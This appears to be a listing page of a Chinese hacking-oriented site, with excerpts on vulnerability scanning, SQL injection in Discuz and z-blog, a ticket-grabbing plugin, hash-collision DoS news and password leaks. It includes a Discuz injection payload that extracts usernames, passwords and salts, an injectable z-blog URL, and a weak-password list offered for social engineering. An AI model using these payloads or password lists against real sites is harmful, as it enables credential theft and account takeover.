利用Acunetix WVS发动批量网站漏洞评估
我们知道Acunetix WVS可以对网站进行安全性评估,那么怎么能批量扫描呢?游侠(www.youxia.org)在测试WVS 8 BETA2的时候发现WVS居然支持WEB管理,还是很方便的。 打开Acunetix WVS,点New Scan,在弹出来的界面可以看到有三个选项: 最下面一个:如果你想扫描一个网站列表,使用Acunetix计划任务,访问http://localhost:8181...
Discuz x1.5 – x2版本 二次注射
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_membe...
z-blog 1.8 wap SQL注入漏洞
https://www.webshell.cc/wap.asp?act=Search&submit=%E6%90%9C&q=88888′ Microsoft JET Database Engine ���� ’80040e14′ �&#
火车票自动登陆刷票辅助插件!
工具集: 本站谷歌浏览器下载地址: 谷歌浏览器:http://disk.webshell.cc/Chrome.rar 如不信任该站请到官方下载: 谷歌浏览器:http://www.google.cn/chrome/intl/zh-CN/landing_chrome.html 自动登录插件,自动刷新查询和提醒整合插件地址: http://disk.webshell.cc/12306BookingAs...
PHP 5.3.9 - 修补重大Hash冲突漏洞
PHP 5.3.9正式版发布了。 此次更新修复了诸多BUG,如Hash冲突漏洞,对于5.3.8的用户,要速度更新。 Security Enhancements and Fixes in PHP 5.3.9: Added max_input_vars directive to prevent attacks based on hash collisions. (CVE-2011-4885) (HAS...
各web语言出了个挺重要的Hash冲突漏洞
近日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞,PHP官方开发组成员Laruence表示攻击者可以通过构造Hash冲突实现拒绝服务攻击,并提供了实例。这个攻击方法危害很高,攻击成本也很小,一个台式机可以轻松搞垮数十台、上百台服务器。 此漏洞一出,相当于随便一个攻击者就可以DDoS掉世界上的大部分网站!危害等级绝对是核弹级别。因此,PHP官方开发组紧急发布了补丁,请大家尽...
CSDN泄密案两名涉案黑客被和谐
备受关注的CSDN泄密案日前有了新的进展!今日,《每日经济新闻》从北京市公安局网安总队获悉, 经过网警调查,已经掌握了部分黑客泄密证据,目前已有两名涉案黑客被抓,相关负责人员表示, 此次泄密与实名制无关,目前还有部分涉案人员未落网,具体案情细节将于近期公布
黑客组织曝光数百名英美高官电子密码
英国《卫报》1月8日报道,一个自封为“骇客活动家”的黑客组织日前将数百名英美政府要员的电子邮箱加密密码曝光在网上, 这些人包括国防部、情报部、警察局的官员,还有一些政治家和北约顾问等。 报道称,该组织属于“匿名者”黑客组织。这些信息可能是黑客在圣诞节前夕从美国防卫情报预测公司 “战略预测”(Stratfor)窃取的,该公司数据库将用户ID(通常为电邮地址)制作成电子表格, 记录有85万个人注册用户...
2012最新password总结,社工你懂得
转载不带版权的,趁早离开 不带版权的,一律,你懂得 转载于歌颂大牛的私人藏品 本博客不喜欢那些拿来主义和偷来主义者 ############ 弱密码 ############ a1b2c3 password 12345-9 qwerty abc123 monkey xiaoming admin 5201314 p@assword qq123456 taobao wang1234 fuckU buz...